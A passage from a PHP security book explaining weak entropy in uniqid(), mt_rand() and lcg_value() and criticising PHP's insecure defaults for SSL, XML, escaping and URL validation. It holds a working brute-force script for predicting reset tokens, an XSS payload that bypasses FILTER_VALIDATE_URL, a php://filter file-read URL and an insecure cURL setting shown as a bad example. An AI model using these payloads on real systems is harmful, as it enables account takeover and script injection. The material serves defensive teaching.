gettimeofday((struct timeval *) &tv, (struct timezone *) NULL);
sec = (int) tv.tv_sec;
usec = (int) (tv.tv_usec % 0x100000);
/* The max value usec can have is 0xF423F, so we use only five hex
* digits for usecs.
*/
if (more_entropy) {
If that looks complicated, you can actually replicate all of this in plain old PHP:
function unique_id($prefix = '', $more_entropy = false) {
    list($usec, $sec) = explode(' ', microtime());
    $usec *= 1000000;
    if (true === $more_entropy) {
        return sprintf('%s%08x%05x%.8F', $prefix, $sec, $usec, lcg_value() * 10);
    } else {
        return sprintf('%s%08x%05x', $prefix, $sec, $usec);
    }
}
This code basically tells us that a simple uniqid() call with no parameters will return a string containing 13 characters. The first 8 characters are the current Unix timestamp (seconds) in hexadecimal. The final 5 characters represent any additional microseconds in hexadecimal. In other words,
a basic uniqid() will provide a very accurate system time measurement which you can dissect from
a simple uniqid() call using something like this:
$id = uniqid();
$time = str_split($id, 8);
$sec = hexdec('0x' . $time[0]);
$usec = hexdec('0x' . $time[1]);
echo 'Seconds: ', $sec, PHP_EOL, 'Microseconds: ', $usec, PHP_EOL;
Indeed, looking at the C code, this accurate system timestamp is never obscured in the output no
matter what parameters you use.
echo uniqid(), PHP_EOL;
echo uniqid('prefix-'), PHP_EOL;
echo uniqid('prefix-', true), PHP_EOL;
// 514ee7f81c4b8
// prefix-514ee7f81c746
// prefix-514ee7f81c8993.39593322
Taking the above example, we can see that by combining a Seed Recovery Attack against mt_rand() and leveraging an Information Disclosure from uniqid(), we can now make inroads in calculating a narrower-than-expected selection of SHA512 hashes that might be a password reset or other sensitive token. Heck, if you want to narrow the timestamp range without any naked uniqid() disclosure leaking system time, server responses will typically have an HTTP Date header to analyse for a server-accurate timestamp. Since this just leaves the remaining entropy as one million possible microsecond values, we can just brute force this in a few seconds!
<?php
echo PHP_EOL;

/**
 * Generate token to crack without leaking microtime
 */
mt_srand(1361723136.7);
$token = hash('sha512', uniqid(mt_rand()));

/**
 * Now crack the Token without the benefit of microsecond measurement
 * but remember we get seconds from HTTP Date header and seed for
 * mt_rand() using earlier attack scenario ;)
 */
$httpDateSeconds = time();
$bruteForcedSeed = 1361723136.7;
mt_srand($bruteForcedSeed);
$prefix = mt_rand();

/**
 * Increment HTTP Date by a few seconds to offset the possibility of
 * us crossing the second tick between uniqid() and time() calls.
 */
for ($j = $httpDateSeconds; $j < $httpDateSeconds + 2; $j++) {
    for ($i = 0; $i < 1000000; $i++) {
        /** Replicate uniqid() token generator in PHP */
        $guess = hash('sha512', sprintf('%s%8x%5x', $prefix, $j, $i));
        if ($token == $guess) {
            echo PHP_EOL, 'Actual Token: ', $token, PHP_EOL,
                'Forced Token: ', $guess, PHP_EOL;
            exit(0);
        }
        if (($i % 20000) == 0) {
            echo '~';
        }
    }
}
As the C code shows, this new source of entropy uses output from an internal php_combined_lcg()
function. This function is actually exposed to userland through the lcg_value() function which I
used in my PHP translation of the uniqid() function. It basically combines two values generated
using two separately seeded Linear Congruential Generators (LCGs). Here is the code actually
used to seed these two LCGs. Similar to mt_rand() seeding, the seeds are generated once per PHP
process and then reused in all subsequent calls.
static void lcg_seed(TSRMLS_D) /* {{{ */
{
struct timeval tv;
if (gettimeofday(&tv, NULL) == 0) {
LCG(s1) = tv.tv_sec ^ (tv.tv_usec<<11);
} else {
LCG(s1) = 1;
}
#ifdef ZTS
LCG(s2) = (long) tsrm_thread_id();
#else
LCG(s2) = (long) getpid();
#endif
/* Add entropy to s2 by calling gettimeofday() again */
if (gettimeofday(&tv, NULL) == 0) {
LCG(s2) ^= (tv.tv_usec<<11);
}
LCG(seeded) = 1;
}
If you stare at this long enough and feel tempted to smash something into your monitor, I'd urge you to reconsider. Monitors are expensive.

The two seeds both use the gettimeofday() function in C to capture the current seconds since the Unix Epoch (relative to the server clock) and microseconds. It's worth noting that both calls are fixed in the source code, so the gap in microseconds between them will be minimal and the uncertainty they add is not a lot. The second seed will also mix in the current process ID which, in most cases, will be a maximum number of 32,768 under Linux. You can, of course, manually set this as high as ~4 million by writing to /proc/sys/kernel/pid_max but it is very unlikely to be set that high.
The pattern emerging here is that the primary source of entropy used by these LCGs is microseconds. For example, remember our mt_rand() seed? Guess how that is calculated.
#ifdef PHP_WIN32
#define GENERATE_SEED() (((long) (time(0) * GetCurrentProcessId())) ^ ((long) (1000000.0 * php_combined_lcg(TSRMLS_C))))
#else
#define GENERATE_SEED() (((long) (time(0) * getpid())) ^ ((long) (1000000.0 * php_combined_lcg(TSRMLS_C))))
#endif
You'll notice that this means that all seeds used in PHP are interdependent and even mix together similar inputs multiple times. You can feasibly limit the range of initial microseconds as we previously discussed, using two requests where the first hits the transition between seconds (so microtime will be 0 plus execution time to the next gettimeofday() C call), and even calculate the delta in microseconds between other gettimeofday() calls with access to the source code (PHP being open source is a leg up). Not to mention that brute forcing a mt_rand() seed gives you the final seed output to play with for offline verification.
The main problem here is, however, php_combined_lcg(). This is the underlying implementation of the userland lcg_value() function which is seeded once per PHP process and where knowledge of the seed makes its output predictable. If we can crack that particular nut, it's effectively game over.
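To see where that matters, here is a rough PHP rendering of how the raw input for a Session ID is assembled (a hypothetical sketch of the behaviour, not PHP's actual C source):

// Sketch: the Session ID pre-hash mixes the remote address, seconds,
// microseconds and php_combined_lcg() output (lcg_value() in userland).
list($usec, $sec) = explode(' ', microtime());
$prehash = sprintf(
    '%.15s%d%d%0.8F',
    $_SERVER['REMOTE_ADDR'],
    $sec,
    (int) ($usec * 1000000),
    lcg_value() * 10
);
// The pre-hash is then run through session.hash_function (MD5 by default).
$sessionId = md5($prehash);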
The above generates a pre-hash value for the Session ID using an IP address, timestamp, microseconds and... the output from php_combined_lcg(). Given a significant reduction in microtime possibilities (the above needs one measurement for generating the ID and two within php_combined_lcg(), which should have minimal differences between them), we can now perform a brute forcing attack. Well, maybe.
As you may recall from earlier, PHP now supports some newer session options such as session.entropy_file and session.entropy_length. The reason for this was to prevent brute forcing attacks on the session ID that would quickly (as in not take hours) reveal the two seeds to the twin LCGs combined by php_combined_lcg(). If you are running PHP 5.3 or less, you may not have those settings properly configured, which would mean you have another useful Information Disclosure vulnerability exposed which will enable brute forcing of session IDs to get the LCG seeds.
There's a Windows app to figure out the LCG seeds in such cases to prove the point: http://blog.ptsecurity.com/2012/08/not-so-random-numbers-take-two.html
More interestingly, knowledge of the LCG states feeds into how mt_rand() is seeded so this is
another path to get around any lack of mt_rand() value leaks.
What does this mean for adding more entropy to uniqid() return values?

$token = hash('sha512', uniqid(mt_rand(), true));
The above is another example of a potential Insufficient Entropy vulnerability. You cannot rely on
entropy which is being leaked from elsewhere (even if you are not responsible for the leaking!).
With the Session ID information disclosure leak, an attacker can predict the extra entropy value
that will be appended to the ID.
Once again, how do we assign blame? If Application X relies on uniqid() but the user or some other application on the same server leaks internal state about PHP's LCGs, we need to mitigate at both ends. Users need to ensure that Session IDs use better entropy, and third-party programmers need to be conscious that their methods of generating random values lack sufficient entropy and switch to better alternatives (even where only weak entropy sources are possible!).
Anthony's RandomLib generates random bytes by mixing various entropy sources and localised information which an attacker would need to work hard to guess. For example, you can mix mt_rand(), uniqid() and lcg_value() output and go further by adding the PID, memory usage, another microtime measurement, a serialisation of $_ENV, posix_times(), etc. You can go even further since RandomLib is extensible. For example, you could throw in some microsecond deltas (i.e. measure how many microseconds some functions take to complete with pseudo-random input such as hash() calls).
/**
 * Generate a 32 byte random value. Can also use these other methods:
 * - generateInt() to output integers up to PHP_INT_MAX
 * - generateString() to map values to a specific character range
 */
$factory = new \RandomLib\Factory;
$generator = $factory->getMediumStrengthGenerator();
$token = hash('sha512', $generator->generate(32));
Arguably, due to RandomLib's footprint and the ready availability of the OpenSSL and Mcrypt extensions, you can instead use RandomLib as a fallback proposition, as is done in the SecurityMultiTool PRNG generator class.
Articles:
CHAPTER 7
PHP Security: Default Vulnerabilities, Security Omissions and Framing Programmers?
Secure By Design is a simple concept in the security world where software is designed from the ground up to be as secure as possible, regardless of whether or not it imposes a disadvantage on the end user. The purpose of this principle is to ensure that users who are not security experts can use the software without necessarily being obliged to jump through hoops to learn how to secure their usage or, much worse, being tempted into ignoring security concerns which expose unaddressed security vulnerabilities due to ignorance, inexperience or laziness. The crux of the principle therefore is to promote trust in the software while, somewhat paradoxically, avoiding too much complexity for the end user.
Odd though it may seem, this principle explains some of PHP's greatest security weaknesses. PHP does not explicitly use Secure By Design as a guiding principle when implementing features. I'm sure it's in the back of developers' minds, just as I'm sure it has influenced many of their design decisions; however, there are issues when you consider how PHP has influenced the security practices of PHP programmers.
The result of not following Secure By Design is that all applications and libraries written in PHP can inherit a number of security vulnerabilities, hereafter referred to as "By-Default Vulnerabilities". It also means that defending against key types of attacks is undermined by PHP not offering sufficient native functionality, and I'll refer to these as "Flawed Assumptions". Combining the two sets of shortcomings, we can establish PHP as existing in an environment where security is being compromised by delegating too much security responsibility to end programmers.
This is the focus of the argument I make in this article: Responsibility. When an application is designed and built only to fall victim to a by-default vulnerability inherited from PHP, or due to user-land defenses based on flawed assumptions about what PHP offers in terms of security defenses, who bears the responsibility? Pointing the finger at the programmer isn't wrong, but it also doesn't tell the whole story, and neither will it improve the security environment for other programmers. At some point, PHP needs to be held accountable for security issues that it has a direct influence on through its settings, its default function parameters, its documentation and its lack thereof. And, at that point, questions need to be asked as to when the blurry line between PHP's default behaviour and a security vulnerability sharpens into focus.
When that line is sharpened, we then reach another question - should PHP's status quo be challenged more robustly by labeling these by-default vulnerabilities and other shortcomings as something that MUST be fixed, as opposed to the current practice of simply blaming the programmer?

It's worth noting that PHP has no official security manual or guide, its population of security books varies dramatically in both quality and scope (you're honestly better off buying something non-specific to PHP than wasting your cash), and the documentation has related gaps and omitted assumptions. If anything, PHP's documentation is the worst guide to security you could ever despair at reading, another oddity in a programming language fleeing its poor security reputation.
This is all wonderfully vague and abstract, and it sounds a lot like I blame PHP for sabotaging security. In many cases, these issues aren't directly attributable to PHP but are still exposed by PHP, so I'm simply following the line of suggestion that if PHP did extensively follow Secure By Design, there would be room for improvement and perhaps those improvements ought to be made. Perhaps they should be catalogued, detailed, publicly criticised and the question asked as to why these shortcomings are tolerated and changes to rectify them resisted.
Is that really such a controversial line of thought? If an application or library contained a feature known to be susceptible to an attack, this would be called out as a security vulnerability without hesitation. When PHP exposes a feature susceptible to attack, we... stick our heads in the sand and find ways of justifying it by pointing fingers at everyone else? It feels a bit icky to me. Maybe it is actually time we called a spade a spade. And then used the damn thing to dig ourselves out of the sand pit.
Let's examine the four most prominent examples I know of where PHP falls short of where I believe it needs to be, and how they have impacted how programmers practice security. There's another undercurrent here in that I strongly believe programmers are influenced by how PHP handles a particular security issue. It's not unusual to see programmers appeal to PHP's authority in justifying programming practices.
1. SSL/TLS Misconfiguration
2. XML Injection Attacks
3. Cross-Site Scripting (Limited Escaping Features)
4. Stream Injection Attacks (incl. Local/Remote File Inclusion)
attacker which means they can decrypt all messages received. This would be unnoticeable if the
MITM acted as a transparent go-between, i.e. client connects to MITM, MITM connects to server,
and MITM makes sure to pass all messages between the client and the server while still being able
to decrypt or manipulate ALL messages between the two.
Since verifying the identity of one or both parties is fundamental to secure SSL/TLS connections,
it remains a complete mystery as to why the SSL Context for PHP Streams defaults to disabling
peer verification, i.e. all such connections carry a by-default vulnerability to MITM attacks unless
the programmer explicitly reconfigures the SSL Context for all HTTPS connections made using
PHP streams or sockets. For example:
file_get_contents('https://www.example.com');
This function call will request the URL and is automatically susceptible to a MITM attack. The same goes for all functions accepting HTTPS URLs (excluding the cURL extension, whose SSL handling is separate). This also applies to some unexpected locations, such as remote URLs contained in the DOCTYPE of an XML file, which we'll cover later in XML Injection Attacks. This problem also applies to all HTTP client libraries making use of PHP streams/sockets, or where the cURL extension was compiled using --with-curlwrappers (there is a separate cURL Context for this scenario where peer verification is also disabled by default).
The options here are somewhat obvious: configuring PHP to use SSL properly is added complexity that programmers are tempted to ignore. Once you go down that road and once you start throwing user data into those connections, you have inherited a security vulnerability that poses a real risk to users. Perhaps more telling is the following function call using the cURL extension for HTTPS connections in place of PHP's built-in feature.
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
This one is far worse than PHP's default position since a programmer must deliberately disable peer verification in cURL. That's blatantly the fault of the programmer and, yes, a lot of programmers do this (Github has a search facility if you want to check for open source examples). To deliberately disable SSL's protection of user data, assuming it's not due to ignorance, can only be described as loathsome, and the tolerance afforded to such security vulnerabilities, at a time when browsers and Certificate Authorities would be publicly and universally condemned for the same thing, reflects extremely poorly on PHP programmers taking security seriously.
Seriously, do NOT do this. Yes, you'll get more errors (browsers display big red warnings too). Yes, end programmers may need to define a path to a CA file. Yes, this is all extra work (and examples are scarce on the ground as to how to do it properly). No, it is NOT optional. Keeping user data secure outweighs any programming difficulty. Deal with it.
Incidentally, you'll notice these settings have two predictable strings: verify_peer and CURLOPT_SSL_VERIFYHOST. I suggest using grep or your preferred search method to scan your source code, and that of all libraries and frameworks, for those strings so that you might see how many vulnerabilities someone upstream injected into your hard work recently.
The question that arises is simple. If a browser screwed up SSL peer verification, it would be
universally ridiculed. If an application neglected to secure SSL connections, it would be both criticised and possibly found in breach of national laws where security has been legislated to a minimum standard. When PHP disables SSL peer verification there is... what exactly? Do we not care? Is it too hard?
Isn't this a security vulnerability in PHP? PHP is not exceptional. It's not special. It's just taking a moronic stance. If it were not moronic, and security was a real concern, this would be fixed. Also, the documentation would be fixed to clearly state how PHP's position is sustainable, followed by lots of examples of how to create secure connections properly. Even that doesn't exist, which appears suspicious since I know it was highlighted previously.
Kevin McArthur has done far more work in this area than I, so here's a link to his own findings on SSL Peerjacking: http://www.unrest.ca/peerjacking
Now you can do a Github or grep search to find hundreds of vulnerabilities, if not thousands. This is of particular note because it highlights another facet of programming securely in PHP. What you don't know will bite you. XML Injection is well known outside of PHP but within PHP it has
been largely ignored which likely means there are countless vulnerabilities in the wild. The now
correct means of loading an XML document is as follows (by correct, I mean essential unless you
are 110% certain that the XML is from a trusted source received over HTTPS - with SSL peer
verification ENABLED to prevent MITM tampering).
$oldValue = libxml_disable_entity_loader(true);
$dom = new DOMDocument;
$dom->loadXML($xmlString);
foreach ($dom->childNodes as $child) {
    if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) {
        throw new \InvalidArgumentException(
            'Invalid XML: Detected use of disallowed DOCTYPE'
        );
    }
}
libxml_disable_entity_loader($oldValue);
As the above suggests, locating the vulnerability in source code can be accomplished by searching for the strings libxml_disable_entity_loader and XML_DOCUMENT_TYPE_NODE. The absence of either string when DOM, SimpleXML and XMLReader are being used may indicate that PHP's by-default vulnerabilities to XML Injection Attacks have not been mitigated.
Once again, who is the duck here? Do we blame programmers for not mitigating a vulnerability inherited from PHP, or blame PHP for allowing that vulnerability to exist by default? If it looks, quacks and swims like a duck, maybe it is a security vulnerability in PHP after all. If so, when can we expect a fix? Never... like SSL Peerjacking by default?
filter_var($_GET['http_url'], FILTER_VALIDATE_URL);

The above looks like it has no problem until you try something like this:

$_GET['http_url'] = "javascript://foobar%0Aalert(1)";
This is a valid Javascript URI. The usual vector would be javascript:alert(1) but this is rejected by the FILTER_VALIDATE_URL validator since the scheme is not valid. To make it valid, we can take advantage of the fact that the filter accepts any alphabetic string followed by :// as a valid scheme. Therefore, we can create a passing URL with:

- javascript: - The universally accepted JS scheme
- //foobar - A JS comment! Valid and gives us the double forward-slash
- %0A - A URL encoded newline which terminates the single line comment
- alert(1) - The JS code we intend executing when the validator fails
This vector also passes with the FILTER_FLAG_PATH_REQUIRED flag enabled, so the lesson here is to be wary of these built-in validators, be absolutely sure you know what each really does, and avoid assumptions (the docs are riddled with HTTP examples, as are the comments, which is plain wrong). Also, validate the scheme yourself since PHP's filter extension doesn't allow you to define a range of accepted schemes and defaults to allowing almost anything...
$_GET['http_url'] = "php://filter/read=convert.base64-encode/resource=/path/to/file";
This also passes and is usable in most PHP filesystem functions. It also, once again, drives home the thread running through all of these examples. If these are not security vulnerabilities in PHP, what the heck are they? Who builds half of a URL validator, omits the most important piece, and then promotes it to core for programmers to deal with its inadequacies? Maybe we're blaming inexperienced programmers for this one too?
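As a minimal sketch of validating the scheme yourself (the function name and the allowed-scheme list are illustrative choices):

// Reject anything whose scheme is not explicitly whitelisted, even if
// FILTER_VALIDATE_URL is happy with it.
function validate_http_url($url)
{
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return false;
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, array('http', 'https'), true);
}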
HTML Context
The commonly used htmlspecialchars() function is the object of programmer obsession. If you believed most of what you read, htmlspecialchars() is the only escaping function in PHP and HTML Body escaping is the only escaping strategy you need to be aware of. In reality, it represents just one escaping strategy - there are four others commonly needed.

When used carefully, wrapped in a secured function or closure, htmlspecialchars() is extremely effective. However, it's not perfect and it does have flaws, which is why you need a wrapper in the first place, particularly when exposing it via a framework or templating API where you cannot control its end usage. Rather than reiterate all the issues here, I've already written a previous article detailing an analysis of htmlspecialchars() and scenarios where it can be compromised leading to escaping bypasses and XSS vulnerabilities: http://blog.astrumfutura.com/2012/03/a-hitchhikers-guide-to-cross-site-scripting-xss-in-php-part-1-how-not-to-use-htmlspecialchars-for-output-escaping/
HTML Attribute Context

PHP does not offer an escaper dedicated to HTML Attributes.

This is required in the event that a HTML attribute is unquoted - which is entirely valid in HTML5, for example. htmlspecialchars() MUST NEVER be used for unquoted attribute values. It must also never be used for single quoted attribute values unless the ENT_QUOTES flag was set. Without additional userland escaping, such as that used by ZendEscaper, this means that all templates, regardless of origin, should be screened to weed out any instances of unquoted/single quoted attribute values.
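For the quoted-attribute case, a minimal sketch looks like this (the attribute itself must always be quoted in the template; the value and attribute names here are illustrative):

// ENT_QUOTES converts both single and double quotes, so the escaped value
// cannot break out of a quoted attribute.
$escaped = htmlspecialchars($untrustedTitle, ENT_QUOTES, 'UTF-8');
echo '<a href="/profile" title="' . $escaped . '">Profile</a>';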
Javascript Context
PHP does not offer an escaper dedicated to Javascript.
Programmers do, however, sometimes vary between using addslashes() and json_encode(). Neither
function applies secure Javascript escaping by default, and not at all in PHP 5.2 or for non-UTF8
character encodings, and both types of escaping are subtly different from literal string and JSON
encoding. Abusing these functions is certainly not recommended. The correct means of escaping
Javascript as part of a HTML document has been documented by OWASP for some time and
implemented in its ESAPI framework. A port to PHP forms part of ZendEscaper.
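One commonly suggested hardening step when embedding data into a script block is shown below (a sketch for PHP 5.3+; it is not a substitute for a dedicated Javascript escaper such as ZendEscaper's):

// The JSON_HEX_* flags encode quotes, ampersands and angle brackets as \uXXXX
// escapes so the value cannot terminate the surrounding script element.
$json = json_encode(
    $untrustedValue,
    JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
);
echo '<script>var data = ' . $json . ';</script>';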
CSS Context
PHP does not offer an escaper dedicated to CSS. A port to PHP of OWASPs ESAPI CSS escaper
forms part of ZendEscaper.
As the above demonstrates, PHP covers 2 of 5 common HTML escaping contexts. There are gaps in its coverage and several flaws in one that it does cover. This track record very obviously shows that PHP is NOT currently concerned about implementing escaping for the web's second most common security vulnerability - a sentiment that has unfortunately pervaded PHP given the serious misunderstandings around context-based escaping in evidence. Perhaps PHP could rectify this particular environmental problem, once and for all, by offering dedicated escaper functions or a class dedicated to this task? I've drafted a simple RFC for this purpose if anyone is willing, with their mega C skills, to take up this banner: https://gist.github.com/3066656
7.5 Conclusion
While a lengthy article, the core purpose here is to illustrate a sampling of PHP behaviours which
exist at odds with good security practices and to pose a few questions. If PHP is a secure programming language, why is it flawed with such insecure defaults and feature omissions? If these are
security vulnerabilities in applications and libraries written in PHP, are they not also therefore vulnerabilities in the language itself? Depending on how those questions are answered, PHP appears
to be both aware of yet continually ignoring serious shortcomings in its security.
At the end of the day, all security vulnerabilities must be blamed on someone - either PHP is at fault and it needs to be fixed, or programmers are at fault for not being aware of these issues. Personally, I find it difficult to blame programmers. They expect their programming language to be secure and it's not an unreasonable demand. Yes, tightening security may make a programmer's life more difficult, but this misses an important point - by not tightening security, their lives are already more difficult, with userland fixes being required, configuration options that need careful monitoring, and documentation omissions, misinformation and poor examples leading them astray.

So PHP, are you a secure programming language or not? I'm no longer convinced that you are and I really don't feel like playing dice with you anymore.
This article can be discussed or commented on at: http://blog.astrumfutura.com/2012/08/php-security-default-vulnerabilities-security-omissions-and-framing-programmers/